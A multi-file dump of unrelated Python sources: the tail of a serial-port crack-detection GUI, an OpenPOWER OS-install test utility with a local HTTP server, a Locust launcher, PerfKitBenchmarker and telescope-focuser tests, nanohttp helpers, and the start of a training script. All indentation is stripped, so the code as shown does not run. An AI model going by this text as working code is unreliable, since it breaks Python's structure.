except Exception as e:
print("ERROR: Unable to close serial port | ",e)
def saveCOMConfig(self):
try:
comConfigFile = open('com.config','w')
com = self.comPortTextField.get()
baudRate = self.baudrateTextField.get()
if com == '' or baudRate == '':
print("ERROR: Please enter valid com and baudrate values")
comConfigFile.close()
return
comConfigFile.write(com + ':' + baudRate)
comConfigFile.close()
except Exception as e:
print("ERROR: Unable to open com.config file | ",e)
def startCalibration(self):
try:
if not self.serialPort.isOpen():
self.startSerialPortCom()
except Exception as e:
print("ERROR: Unable to open serial port | ", e)
return
#TODO: Put this whole block in try and catch and make changes in status text
self.calibrateBtn.config(text= "Calibrating...")
self.calibrateBtn.config(state = 'disable')
self.startBtn.config(state = 'disable')
try:
self.mainCalibration.max_distance = float(self.maxDistanceField.get())
calibrationTime = float(self.calibrationTimeTextField.get())
except Exception as e:
print("Please enter valid number arguments | ", e)
endTime = datetime.now() + timedelta(seconds=calibrationTime)
distanceList = []
print("STATUS: Reading input....please wait...")
self.serialPort.reset_input_buffer()
while(datetime.now()<endTime):
serialString = ''
try:
if(self.serialPort.in_waiting > 0):
serialString = self.serialPort.readline().strip()
distance = float(serialString.decode('Ascii'))
distanceList.append(distance)
except Exception as e:
print("WARNING: Skipped corrupted bytes! | ",e)
data = np.array(distanceList)
self.mainCalibration.surface_normal = np.mean(data)
self.mainCalibration.surface_min_distance = np.min(data)
self.mainCalibration.surface_max_distance = np.max(data)
self.mainCalibration.max_error = self.mainCalibration.surface_max_distance - self.mainCalibration.surface_normal
self.mainCalibration.min_error = self.mainCalibration.surface_min_distance - self.mainCalibration.surface_normal
self.mainCalibration.mean_error = np.mean(data - self.mainCalibration.surface_normal)
self.mainCalibration.is_calibrated = True
print("Normal surface reading = ", self.mainCalibration.surface_normal)
print("Minimum surface reading: ", self.mainCalibration.surface_min_distance)
print("Maximum surface reading = ", self.mainCalibration.surface_max_distance)
print("Maximum error = ", self.mainCalibration.max_error)
print("Minimum error = ", self.mainCalibration.min_error)
print("Mean error = ", self.mainCalibration.mean_error)
if self.mainCalibration.max_distance < self.mainCalibration.surface_max_distance:
self.mainCalibration.is_calibrated = False
print("ERROR: Calibration failed due to noisy readings. Please calibrate again before using the application.")
self.calibrateBtn.config(text = "Calibrate Now!")
self.calibrateBtn.config(state = 'normal')
self.startBtn.config(state = 'normal')
else:
self.calibrateBtn.config(text = "Calibrate")
self.calibrateBtn.config(state = 'normal')
self.startBtn.config(state = 'normal')
self.mainCalibration.is_calibrated = True
if self.serialPort.isOpen():
self.stopSerialPortCom()
def startDetection(self):
self.depthSensitivity = float(self.depthTextField.get())
if self.IS_DETECTION_ON:
self.IS_DETECTION_ON = False
self.startBtn.config(bg='#66BB6A', text='Start Detection')
else:
if not self.mainCalibration.is_calibrated:
if self.serialPort.isOpen():
self.stopSerialPortCom()
threading.Thread(target=self.startCalibration(), daemon=True).start()
self.mainCalibration.surface_threshold = self.mainCalibration.surface_normal + self.mainCalibration.mean_error + self.depthSensitivity
print("Surface threshold", self.mainCalibration.surface_threshold)
print("Detecting surface...")
try:
if not self.serialPort.isOpen():
self.startSerialPortCom()
except Exception as e:
print("ERROR: Unable to open serial port | ",e)
return
self.IS_DETECTION_ON = True
self.startBtn.config(bg='#e57373', text='Stop Detection')
try:
dataLogFile = open('log.data', 'w')
dataLogFile.write('0,')
dataLogFile.close()
except Exception as e:
print("ERROR: Unable to create data log file. Graph features will not work properly | ",e)
while(self.IS_DETECTION_ON):
try:
if(self.serialPort.in_waiting > 0):
try:
dataLogFile = open('log.data', 'a')
except Exception as e:
print("ERROR: Unable to create data log file. Graph features will not work | ",e)
serialString = self.serialPort.readline()
distance = float(serialString.decode('Ascii').strip())
if distance<self.mainCalibration.max_distance:
dataLogFile.write(str(distance)+",")
if(distance > self.mainCalibration.surface_threshold):
print("Crack Detected: ", distance)
threading.Thread(target=self.sendSMS(distance)).start()
dataLogFile.close()
except Exception:
print("WARNING: Skipped corrupted bytes!")
self.IS_DETECTION_ON = False
if self.serialPort.isOpen():
self.stopSerialPortCom()
def sendSMS(self, distance):
if not self.SMS_ONGOING:
self.SMS_ONGOING = True
print("INFO: Sending SMS")
self.smsEndTime = datetime.now()+timedelta(seconds=30)
os.system('python sms.py '+str(distance))
elif datetime.now()>self.smsEndTime:
self.SMS_ONGOING = False
self.sendSMS(distance)
else:
return
if __name__ == '__main__':
window = tk.Tk()
try:
window.iconbitmap('ic.ico')
except:
print("WARNING: ic.ico file missing or not supported")
window.title("Crack Detection(1.1)- amannirala13")
App(root = window)
window.mainloop()
|
OpTestInstallUtil.py
|
#!/usr/bin/env python2
# OpenPOWER Automated Test Project
#
# Contributors Listed Below - COPYRIGHT 2018
# [+] International Business Machines Corp.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
# OpTest Install Utils
#
import shutil
import urllib2
import os
import threading
import SocketServer
import BaseHTTPServer
import SimpleHTTPServer
import cgi
import commands
import time
from Exceptions import CommandFailed
import OpTestConfiguration
BASE_PATH = ""
INITRD = ""
VMLINUX = ""
KS = ""
DISK = ""
USERNAME = ""
PASSWORD = ""
REPO = ""
BOOTPATH = ""
conf = OpTestConfiguration.conf
uploaded_files = {}
class InstallUtil():
def __init__(self, base_path="", initrd="", vmlinux="",
ks="", boot_path="", repo=""):
global BASE_PATH
global INITRD
global VMLINUX
global KS
global DISK
global USERNAME
global PASSWORD
global BOOTPATH
global REPO
global PROXY
self.conf = conf
self.host = conf.host()
self.system = conf.system()
self.system.host_console_unique_prompt()
self.console = self.system.sys_get_ipmi_console()
self.server = ""
self.repo = conf.args.os_repo
REPO = self.repo
DISK = self.host.get_scratch_disk()
USERNAME = self.host.username()
PASSWORD = self.host.password()
BOOTPATH = boot_path
BASE_PATH = base_path
INITRD = initrd
VMLINUX = vmlinux
PROXY = self.host.get_proxy()
KS = ks
def wait_for_network(self):
retry = 6
while retry > 0:
try:
self.console.run_command("ifconfig -a")
return True
except CommandFailed as cf:
if cf.exitcode is 1:
time.sleep(5)
retry = retry - 1
pass
else:
raise cf
def ping_network(self):
retry = 6
while retry > 0:
try:
ip = self.conf.args.host_gateway
if ip in [None, ""]:
ip = self.system.get_my_ip_from_host_perspective()
cmd = "ping %s -c 1" % ip
self.console.run_command(cmd)
return True
except CommandFailed as cf:
if retry == 1:
raise cf
if cf.exitcode is 1:
time.sleep(5)
retry = retry - 1
pass
else:
raise cf
def assign_ip_petitboot(self):
"""
Assign host ip in petitboot
"""
self.console.run_command("stty cols 300")
self.console.run_command("stty rows 30")
# Lets reduce timeout in petitboot
self.console.run_command("nvram --update-config petitboot,timeout=10")
cmd = "ip addr|grep -B1 -i %s|grep BROADCAST|awk -F':' '{print $2}'" % self.conf.args.host_mac
iface = self.console.run_command(cmd)[0].strip()
cmd = "ifconfig %s %s netmask %s" % (iface, self.host.ip, self.conf.args.host_submask)
self.console.run_command(cmd)
cmd = "route add default gateway %s" % self.conf.args.host_gateway
self.console.run_command_ignore_fail(cmd)
cmd = "echo 'nameserver %s' > /etc/resolv.conf" % self.conf.args.host_dns
self.console.run_command(cmd)
def get_server_ip(self):
"""
Get IP of server where test runs
"""
my_ip = ""
self.wait_for_network()
# Check if ip is assigned in petitboot
try:
self.ping_network()
except CommandFailed as cf:
self.assign_ip_petitboot()
self.ping_network()
retry = 30
while retry > 0:
try:
my_ip = self.system.get_my_ip_from_host_perspective()
print repr(my_ip)
self.console.run_command("ping %s -c 1" % my_ip)
break
except CommandFailed as cf:
if cf.exitcode is 1:
time.sleep(1)
retry = retry - 1
pass
else:
raise cf
return my_ip
def get_uploaded_file(self, name):
return uploaded_files.get(name)
def start_server(self, server_ip):
"""
Start local http server
"""
HOST, PORT = "0.0.0.0", 0
global REPO
self.server = ThreadedHTTPServer((HOST, PORT), ThreadedHTTPHandler)
ip, port = self.server.server_address
if not REPO:
REPO = "http://%s:%s/repo" % (server_ip, port)
print "# Listening on %s:%s" % (ip, port)
server_thread = threading.Thread(target=self.server.serve_forever)
server_thread.daemon = True
server_thread.start()
print "# Server running in thread:", server_thread.name
return port
def stop_server(self):
"""
Stops local http server
"""
self.server.shutdown()
self.server.server_close()
return
def setup_repo(self, cdrom):
"""
Sets up repo from given cdrom.
Check if given cdrom is url or file
if url, download in the BASE_PATH and
mount to repo folder
:params cdrom: OS cdrom path local or remote
"""
repo_path = os.path.join(BASE_PATH, 'repo')
abs_repo_path = os.path.abspath(repo_path)
# Clear already mount repo
if os.path.ismount(repo_path):
status, output = commands.getstatusoutput("umount %s" % abs_repo_path)
if status != 0:
print "failed to unmount", abs_repo_path
return ""
elif os.path.isdir(repo_path):
shutil.rmtree(repo_path)
else:
pass
if not os.path.isdir(repo_path):
os.makedirs(abs_repo_path)
if os.path.isfile(cdrom):
cdrom_path = cdrom
else:
cdrom_url = urllib2.urlopen(cdrom)
if not cdrom_url:
print "Unknown cdrom path %s" % cdrom
return ""
with open(os.path.join(BASE_PATH, "iso"), 'wb') as f:
f.write(cdrom_url.read())
cdrom_path = os.path.join(BASE_PATH, "iso")
cmd = "mount -t iso9660 -o loop %s %s" % (cdrom_path, abs_repo_path)
status, output = commands.getstatusoutput(cmd)
if status != 0:
print "Failed to mount iso %s on %s\n %s", (cdrom, abs_repo_path,
output)
return ""
return abs_repo_path
def extract_install_files(self, repo_path):
"""
extract the install file from given repo path
:params repo_path: os repo path either local or remote
"""
vmlinux_src = os.path.join(repo_path, BOOTPATH, VMLINUX)
initrd_src = os.path.join(repo_path, BOOTPATH, INITRD)
vmlinux_dst = os.path.join(BASE_PATH, VMLINUX)
initrd_dst = os.path.join(BASE_PATH, INITRD)
# let us make sure, no old vmlinux, initrd
if os.path.isfile(vmlinux_dst):
os.remove(vmlinux_dst)
if os.path.isfile(initrd_dst):
os.remove(initrd_dst)
if os.path.isdir(repo_path):
try:
shutil.copyfile(vmlinux_src, vmlinux_dst)
shutil.copyfile(initrd_src, initrd_dst)
except Exception:
return False
else:
vmlinux_file = urllib2.urlopen(vmlinux_src)
initrd_file = urllib2.urlopen(initrd_src)
if not (vmlinux_file and initrd_file):
print "Unknown repo path %s, %s" % (vmlinux_src, initrd_src)
return False
try:
with open(vmlinux_dst, 'wb') as f:
f.write(vmlinux_file.read())
with open(initrd_dst, 'wb') as f:
f.write(initrd_file.read())
except Exception:
return False
return True
def set_bootable_disk(self, disk):
"""
Sets the given disk as default bootable entry in petitboot
"""
self.system.sys_set_bootdev_no_override()
self.system.host_console_unique_prompt()
self.console.run_command("stty cols 300")
self.console.run_command("stty rows 30")
# FIXME: wait till the device(disk) discovery in petitboot
time.sleep(60)
cmd = 'blkid %s*' % disk
output = self.console.run_command(cmd)
uuid = output[0].split(':')[1].split('=')[1].replace("\"", "")
cmd = 'nvram --update-config "auto-boot?=true"'
output = self.console.run_command(cmd)
cmd = 'nvram --update-config petitboot,bootdevs=uuid:%s' % uuid
output = self.console.run_command(cmd)
cmd = 'nvram --print-config'
output = self.console.run_command(cmd)
return
class ThreadedHTTPHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_HEAD(self):
# FIXME: Local repo unable to handle http request while installation
# Avoid using cdrom if your kickstart file needs repo, if installation
# just needs vmlinx and initrd from cdrom, cdrom still can be used.
if "repo" in self.path:
self.path = BASE_PATH + self.path
f = self.send_head()
if f:
f.close()
else:
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
def do_GET(self):
if "repo" in self.path:
self.path = BASE_PATH + self.path
f = self.send_head()
if f:
try:
self.copyfile(f, self.wfile)
finally:
f.close()
else:
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
print "# Webserver was asked for: ", self.path
if self.path == "/%s" % VMLINUX:
f = open("%s/%s" % (BASE_PATH, VMLINUX), "r")
d = f.read()
self.wfile.write(d)
f.close()
return
elif self.path == "/%s" % INITRD:
f = open("%s/%s" % (BASE_PATH, INITRD), "r")
d = f.read()
self.wfile.write(d)
f.close()
return
elif self.path == "/%s" % KS:
f = open("%s/%s" % (BASE_PATH, KS), "r")
d = f.read()
if "hostos" in BASE_PATH:
ps = d.format(REPO, PROXY, PASSWORD, DISK, DISK, DISK)
elif "rhel" in BASE_PATH:
ps = d.format(REPO, PROXY, PASSWORD, DISK, DISK, DISK)
elif "ubuntu" in BASE_PATH:
user = USERNAME
if user == 'root':
user = 'ubuntu'
packages = "openssh-server build-essential lvm2 ethtool "
packages+= "nfs-common ssh ksh lsvpd nfs-kernel-server iprutils procinfo "
packages+= "sg3-utils lsscsi libaio-dev libtime-hires-perl "
packages+= "acpid tgt openjdk-8* zip git automake python "
packages+= "expect gcc g++ gdb "
packages+= "python-dev p7zip python-stevedore python-setuptools "
packages+= "libvirt-dev numactl libosinfo-1.0-0 python-pip "
packages+= "linux-tools-common linux-tools-generic lm-sensors "
packages+= "ipmitool i2c-tools pciutils opal-prd opal-utils "
packages+= "device-tree-compiler fwts"
ps = d.format("openpower", "example.com",
PROXY, PASSWORD, PASSWORD, user, PASSWORD, PASSWORD, DISK, packages)
else:
print "unknown distro"
self.wfile.write(ps)
return
else:
self.send_response(404)
return
def do_POST(self):
path = os.path.normpath(self.path)
path = path[1:]
path_elements = path.split('/')
print "INCOMING"
print repr(path)
print repr(path_elements)
if path_elements[0] != "upload":
return
form = cgi.FieldStorage(
fp = self.rfile,
headers = self.headers,
environ={ "REQUEST_METHOD": "POST",
"CONTENT_TYPE": self.headers['Content-Type']})
uploaded_files[form["file"].filename] = form["file"].value
self.wfile.write("Success")
class ThreadedHTTPServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
pass
|
locusts.py
|
#! python3
# -*- encoding: utf-8 -*-
'''
Current module: httplocust.locusts
Rough version history:
v1.0 Original version to use
********************************************************************
@AUTHOR: Administrator-Bruce Luo(罗科峰)
MAIL: luokefeng@163.com
RCS: httplocust.locusts, v1.0 2018年10月23日
FROM: 2018年10月23日
********************************************************************
======================================================================
this module reference from httprunner
'''
import io
import multiprocessing
import os
import sys
from rtsf.p_applog import color_print
from rtsf.p_testcase import YamlCaseLoader
from locust.main import main
def parse_locustfile(file_path):
""" parse testcase file and return locustfile path.
if file_path is a Python file, assume it is a locustfile
if file_path is a YAML/JSON file, convert it to locustfile
"""
if not os.path.isfile(file_path):
color_print("file path invalid, exit.", "RED")
sys.exit(1)
file_suffix = os.path.splitext(file_path)[1]
if file_suffix == ".py":
locustfile_path = file_path
elif file_suffix in ['.yaml', '.yml', '.json']:
locustfile_path = gen_locustfile(file_path)
else:
# '' or other suffix
color_print("file type should be YAML/JSON/Python, exit.", "RED")
sys.exit(1)
return locustfile_path
def gen_locustfile(testcase_file_path):
""" generate locustfile from template.
"""
locustfile_path = 'locustfile.py'
template_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"template",
"locustfile_template"
)
YamlCaseLoader.load_dependencies(testcase_file_path)
testset = YamlCaseLoader.load_file(testcase_file_path)
host = testset.get("project", {}).get("locust", {}).get("host", "")
with io.open(template_path, encoding='utf-8') as template:
with io.open(locustfile_path, 'w', encoding='utf-8') as locustfile:
template_content = template.read()
template_content = template_content.replace("$HOST", host)
template_content = template_content.replace("$TESTCASE_FILE", testcase_file_path)
locustfile.write(template_content)
return locustfile_path
def start_master(sys_argv):
sys_argv.append("--master")
sys.argv = sys_argv
main()
def start_slave(sys_argv):
if "--slave" not in sys_argv:
sys_argv.extend(["--slave"])
sys.argv = sys_argv
main()
def run_locusts_with_processes(sys_argv, processes_count):
processes = []
manager = multiprocessing.Manager()
for _ in range(processes_count):
p_slave = multiprocessing.Process(target=start_slave, args=(sys_argv,))
p_slave.daemon = True
p_slave.start()
processes.append(p_slave)
try:
if "--slave" in sys_argv:
[process.join() for process in processes]
else:
start_master(sys_argv)
except KeyboardInterrupt:
manager.shutdown()
|
vm_util_test.py
|
# Copyright 2014 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for perfkitbenchmarker.vm_util."""
import functools
import multiprocessing
import multiprocessing.managers
import os
import psutil
import subprocess
import threading
import time
import unittest
import mock
from perfkitbenchmarker import errors
from perfkitbenchmarker import vm_util
class ShouldRunOnInternalIpAddressTestCase(unittest.TestCase):
def setUp(self):
p = mock.patch(vm_util.__name__ + '.FLAGS')
self.flags = p.start()
self.flags_patch = p
self.sending_vm = mock.MagicMock()
self.receiving_vm = mock.MagicMock()
def tearDown(self):
self.flags_patch.stop()
def _RunTest(self, expectation, ip_addresses, is_reachable=True):
self.flags.ip_addresses = ip_addresses
self.sending_vm.IsReachable.return_value = is_reachable
self.assertEqual(
expectation,
vm_util.ShouldRunOnInternalIpAddress(
self.sending_vm, self.receiving_vm))
def testExternal_Reachable(self):
self._RunTest(False, vm_util.IpAddressSubset.EXTERNAL, True)
def testExternal_Unreachable(self):
self._RunTest(False, vm_util.IpAddressSubset.EXTERNAL, False)
def testInternal_Reachable(self):
self._RunTest(True, vm_util.IpAddressSubset.INTERNAL, True)
def testInternal_Unreachable(self):
self._RunTest(True, vm_util.IpAddressSubset.INTERNAL, False)
def testBoth_Reachable(self):
self._RunTest(True, vm_util.IpAddressSubset.BOTH, True)
def testBoth_Unreachable(self):
self._RunTest(True, vm_util.IpAddressSubset.BOTH, False)
def testReachable_Reachable(self):
self._RunTest(True, vm_util.IpAddressSubset.REACHABLE, True)
def testReachable_Unreachable(self):
self._RunTest(
False, vm_util.IpAddressSubset.REACHABLE, False)
def HaveSleepSubprocess():
"""Checks if the current process has a sleep subprocess."""
for child in psutil.Process(os.getpid()).children(recursive=True):
if 'sleep' in child.cmdline():
return True
return False
class WaitUntilSleepTimer(threading.Thread):
"""Timer that waits for a sleep subprocess to appear.
This is intended for specific tests that want to trigger timer
expiry as soon as it detects that a subprocess is executing a
"sleep" command.
It assumes that the test driver is not parallelizing the tests using
this method since that may lead to inconsistent results.
TODO(klausw): If that's an issue, could add a unique fractional part
to the sleep command args to distinguish them.
"""
def __init__(self, interval, function):
threading.Thread.__init__(self)
self.end_time = time.time() + interval
self.function = function
self.finished = threading.Event()
self.have_sleep = threading.Event()
def WaitForSleep():
while not self.finished.is_set():
if HaveSleepSubprocess():
self.have_sleep.set()
break
time.sleep(0) # yield to other Python threads
threading.Thread(target=WaitForSleep).run()
def cancel(self):
self.finished.set()
def run(self):
while time.time() < self.end_time and not self.have_sleep.is_set():
time.sleep(0) # yield to other Python threads
if not self.finished.is_set():
self.function()
self.finished.set()
def _ReturnArgs(a, b=None):
return b, a
def _RaiseValueError():
raise ValueError('ValueError')
def _IncrementCounter(lock, counter):
with lock:
counter.value += 1
def _AppendLength(int_list):
int_list.append(len(int_list))
class GetCallStringTestCase(unittest.TestCase):
def testNoArgs(self):
result = vm_util._GetCallString((_ReturnArgs, (), {}))
self.assertEqual(result, '_ReturnArgs()')
def testArgs(self):
result = vm_util._GetCallString((_ReturnArgs, ('blue', 5), {}))
self.assertEqual(result, '_ReturnArgs(blue, 5)')
def testKwargs(self):
result = vm_util._GetCallString((_ReturnArgs, (), {'x': 8}))
self.assertEqual(result, '_ReturnArgs(x=8)')
def testArgsAndKwargs(self):
result = vm_util._GetCallString((_ReturnArgs, ('blue', 5), {'x': 8}))
self.assertEqual(result, '_ReturnArgs(blue, 5, x=8)')
def testSinglePartial(self):
_ReturnArgs2 = functools.partial(_ReturnArgs, 1, x=2)
result = vm_util._GetCallString((_ReturnArgs2, (), {}))
self.assertEqual(result, '_ReturnArgs(1, x=2)')
result = vm_util._GetCallString((_ReturnArgs2, ('blue', 5), {'x': 8}))
self.assertEqual(result, '_ReturnArgs(1, blue, 5, x=8)')
def testDoublePartial(self):
_ReturnArgs2 = functools.partial(_ReturnArgs, 1, x=2)
_ReturnArgs3 = functools.partial(_ReturnArgs2, 3, x=4)
result = vm_util._GetCallString((_ReturnArgs3, (), {}))
self.assertEqual(result, '_ReturnArgs(1, 3, x=4)')
result = vm_util._GetCallString((_ReturnArgs3, ('blue', 5), {'x': 8}))
self.assertEqual(result, '_ReturnArgs(1, 3, blue, 5, x=8)')
class RunParallelThreadsTestCase(unittest.TestCase):
def testFewerThreadsThanConcurrencyLimit(self):
calls = [(_ReturnArgs, ('a',), {'b': i}) for i in range(2)]
result = vm_util.RunParallelThreads(calls, max_concurrency=4)
self.assertEqual(result, [(0, 'a'), (1, 'a')])
def testMoreThreadsThanConcurrencyLimit(self):
calls = [(_ReturnArgs, ('a',), {'b': i}) for i in range(10)]
result = vm_util.RunParallelThreads(calls, max_concurrency=4)
self.assertEqual(result, [(i, 'a') for i in range(10)])
def testException(self):
int_list = []
calls = [(_AppendLength, (int_list,), {}), (_RaiseValueError, (), {}),
(_AppendLength, (int_list,), {})]
with self.assertRaises(errors.VmUtil.ThreadException):
vm_util.RunParallelThreads(calls, max_concurrency=1)
self.assertEqual(int_list, [0, 1])
class RunThreadedTestCase(unittest.TestCase):
def testNonListParams(self):
with self.assertRaises(ValueError):
vm_util.RunThreaded(_ReturnArgs, 'blue')
def testNoParams(self):
result = vm_util.RunThreaded(_ReturnArgs, [])
self.assertEqual(result, [])
def testInvalidTupleParams(self):
with self.assertRaises(ValueError):
vm_util.RunThreaded(_ReturnArgs, [('blue', 'red')])
def testSimpleListParams(self):
result = vm_util.RunThreaded(_ReturnArgs, ['blue', 'red'])
self.assertEqual(result, [(None, 'blue'), (None, 'red')])
def testListOfTupleParams(self):
result = vm_util.RunThreaded(
_ReturnArgs, [(('red',), {}), (('green',), {'b': 'blue'})])
self.assertEqual(result, [(None, 'red'), ('blue', 'green')])
class RunParallelProcessesTestCase(unittest.TestCase):
def testFewerThreadsThanConcurrencyLimit(self):
calls = [(_ReturnArgs, ('a',), {'b': i}) for i in range(2)]
result = vm_util.RunParallelProcesses(calls, max_concurrency=4)
self.assertEqual(result, [(0, 'a'), (1, 'a')])
def testMoreThreadsThanConcurrencyLimit(self):
calls = [(_ReturnArgs, ('a',), {'b': i}) for i in range(10)]
result = vm_util.RunParallelProcesses(calls, max_concurrency=4)
self.assertEqual(result, [(i, 'a') for i in range(10)])
def testException(self):
manager = multiprocessing.managers.SyncManager()
manager.start()
lock = manager.Lock()
counter = manager.Value('i', 0)
calls = [(_IncrementCounter, (lock, counter), {}),
(_RaiseValueError, (), {}),
(_IncrementCounter, (lock, counter), {})]
with self.assertRaises(errors.VmUtil.CalledProcessException):
vm_util.RunParallelProcesses(calls, max_concurrency=1)
self.assertEqual(counter.value, 2)
class IssueCommandTestCase(unittest.TestCase):
def testTimeoutNotReached(self):
_, _, retcode = vm_util.IssueCommand(['sleep', '0s'])
self.assertEqual(retcode, 0)
@mock.patch('threading.Timer', new=WaitUntilSleepTimer)
def testTimeoutReached(self):
_, _, retcode = vm_util.IssueCommand(['sleep', '2s'], timeout=1)
self.assertEqual(retcode, -9)
self.assertFalse(HaveSleepSubprocess())
def testNoTimeout(self):
_, _, retcode = vm_util.IssueCommand(['sleep', '0s'], timeout=None)
self.assertEqual(retcode, 0)
def testNoTimeout_ExceptionRaised(self):
with mock.patch('subprocess.Popen', spec=subprocess.Popen) as mock_popen:
mock_popen.return_value.communicate.side_effect = KeyboardInterrupt()
with self.assertRaises(KeyboardInterrupt):
vm_util.IssueCommand(['sleep', '2s'], timeout=None)
self.assertFalse(HaveSleepSubprocess())
if __name__ == '__main__':
unittest.main()
|
helpers.py
|
import cgi
import threading
import pymlconf
import ujson
from . import exceptions
from .configuration import settings, configure
class LazyAttribute:
""" ``LazyAttribute`` decorator is intended to promote a
function call to object attribute. This means the
function is called once and replaced with
returned value.
>>> class A:
... def __init__(self):
... self.counter = 0
... @LazyAttribute
... def count(self):
... self.counter += 1
... return self.counter
>>> a = A()
>>> a.count
1
>>> a.count
1
"""
__slots__ = ('f', )
def __init__(self, f):
self.f = f
def __get__(self, obj, t=None):
f = self.f
if obj is None:
return f
val = f(obj)
setattr(obj, f.__name__, val)
return val
def quickstart(controller=None, application=None, host='localhost', port=8080,
block=True, config=None):
from wsgiref.simple_server import make_server
try:
settings.debug
except pymlconf.ConfigurationNotInitializedError:
configure()
if config:
settings.merge(config)
if application is not None:
app = application
elif controller is None:
from wsgiref.simple_server import demo_app
app = demo_app
else:
from nanohttp.application import Application
app = Application(root=controller)
port = int(port)
httpd = make_server(host, port, app)
print("Serving http://%s:%d" % (host or 'localhost', port))
if block: # pragma: no cover
httpd.serve_forever()
else:
t = threading.Thread(target=httpd.serve_forever, daemon=True)
t.start()
def shutdown():
httpd.shutdown()
httpd.server_close()
t.join()
return shutdown
def get_cgi_field_value(field):
# noinspection PyProtectedMember
return field.value if isinstance(field, cgi.MiniFieldStorage) \
or (isinstance(field, cgi.FieldStorage) and not field._binary_file) \
else field
def parse_any_form(environ, content_length=None, content_type=None):
if content_type == 'application/json':
if content_length is None:
raise exceptions.HTTPBadRequest('Content-Length required')
fp = environ['wsgi.input']
data = fp.read(content_length)
try:
return ujson.decode(data)
except (ValueError, TypeError):
raise exceptions.HTTPBadRequest('Cannot parse the request')
try:
storage = cgi.FieldStorage(
fp=environ['wsgi.input'],
environ=environ,
strict_parsing=False,
keep_blank_values=True
)
except (TypeError, ValueError):
raise exceptions.HTTPBadRequest('Cannot parse the request')
result = {}
if storage.list is None or not len(storage.list):
return result
for k in storage:
v = storage[k]
if isinstance(v, list):
result[k] = [get_cgi_field_value(i) for i in v]
else:
result[k] = get_cgi_field_value(v)
return result
|
test_focuser.py
|
import time
import pytest
from threading import Thread
from panoptes.utils.config.helpers import load_config
from panoptes.pocs.focuser.simulator import Focuser as SimFocuser
from panoptes.pocs.focuser.birger import Focuser as BirgerFocuser
from panoptes.pocs.focuser.focuslynx import Focuser as FocusLynxFocuser
from panoptes.pocs.camera.simulator.dslr import Camera
params = [SimFocuser, BirgerFocuser, FocusLynxFocuser]
ids = ['simulator', 'birger', 'focuslynx']
# Ugly hack to access id inside fixture
@pytest.fixture(scope='function', params=zip(params, ids), ids=ids)
def focuser(request):
if request.param[0] == SimFocuser:
# Simulated focuser, just create one and return it
return request.param[0]()
else:
# Load the local config file and look for focuser configurations of the specified type
focuser_configs = []
local_config = load_config('pocs_local', load_local=True)
camera_info = local_config.get('cameras')
if camera_info:
# Local config file has a cameras section
camera_configs = camera_info.get('devices')
if camera_configs:
# Local config file camera section has a devices list
for camera_config in camera_configs:
if camera_config:
focuser_config = camera_config.get('focuser', None)
if focuser_config and focuser_config['model'] == request.param[1]:
# Camera config has a focuser section, and it's the right type
focuser_configs.append(focuser_config)
if not focuser_configs:
pytest.skip(
"Found no {} configurations in pocs_local.yaml, skipping tests".format(
request.param[1]))
# Create and return a Focuser based on the first config
return request.param[0](**focuser_configs[0])
@pytest.fixture(scope='function')
def tolerance(focuser):
"""
Tolerance for confirming focuser has moved to the requested position. The Birger may be
1 or 2 encoder steps off.
"""
if isinstance(focuser, SimFocuser):
return 0
elif isinstance(focuser, BirgerFocuser):
return 2
elif isinstance(focuser, FocusLynxFocuser):
return 0
def test_init(focuser):
"""
Confirm proper init & exercise some of the property getters
"""
assert focuser.is_connected
# Expect UID to be a string (or integer?) of non-zero length? Just assert its True
assert focuser.uid
def test_move_to(focuser, tolerance):
focuser.move_to(100)
assert focuser.position == pytest.approx(100, abs=tolerance)
def test_move_by(focuser, tolerance):
focuser.move_to(100)
previous_position = focuser.position
increment = -13
focuser.move_by(increment)
assert focuser.position == pytest.approx((previous_position + increment), abs=tolerance)
def test_is_ready(focuser):
move_thread = Thread(target=focuser.move_by, args=[13])
assert not focuser.is_moving
assert focuser.is_ready
move_thread.start()
time.sleep(0.01)
assert focuser.is_moving
assert not focuser.is_ready
move_thread.join()
assert not focuser.is_moving
assert focuser.is_ready
def test_position_setter(focuser, tolerance):
"""
Can assign to position property as an alternative to move_to() method
"""
focuser.position = 75
assert focuser.position == pytest.approx(75, abs=tolerance)
def test_move_below_min_position(focuser, tolerance):
focuser.move_to(focuser.min_position - 100)
assert focuser.position == pytest.approx(focuser.min_position, tolerance)
def test_move_above_max_positons(focuser, tolerance):
focuser.move_to(focuser.max_position + 100)
assert focuser.position == pytest.approx(focuser.max_position, tolerance)
def test_camera_association(focuser):
"""
Test association of Focuser with Camera after initialisation (getter, setter)
"""
sim_camera_1 = Camera()
sim_camera_2 = Camera()
# Cameras in the fixture haven't been associated with a Camera yet, this should work
focuser.camera = sim_camera_1
assert focuser.camera is sim_camera_1
# Attempting to associate with a second Camera should fail, though.
focuser.camera = sim_camera_2
assert focuser.camera is sim_camera_1
def test_camera_init():
"""
Test focuser init via Camera constructor
"""
sim_camera = Camera(focuser={'model': 'panoptes.pocs.focuser.simulator.Focuser',
'focus_port': '/dev/ttyFAKE'})
assert isinstance(sim_camera.focuser, SimFocuser)
assert sim_camera.focuser.is_connected
assert sim_camera.focuser.uid
assert sim_camera.focuser.camera is sim_camera
def test_camera_association_on_init():
"""
Test association of Focuser with Camera during Focuser init
"""
sim_camera = Camera()
focuser = SimFocuser(camera=sim_camera)
assert focuser.camera is sim_camera
|
trainer.py
|
"""
training script
date: 10/4
author: arabian9ts
"""
# escape matplotlib error
import matplotlib
matplotlib.use('Agg')
# escape tensorflow warning
import os
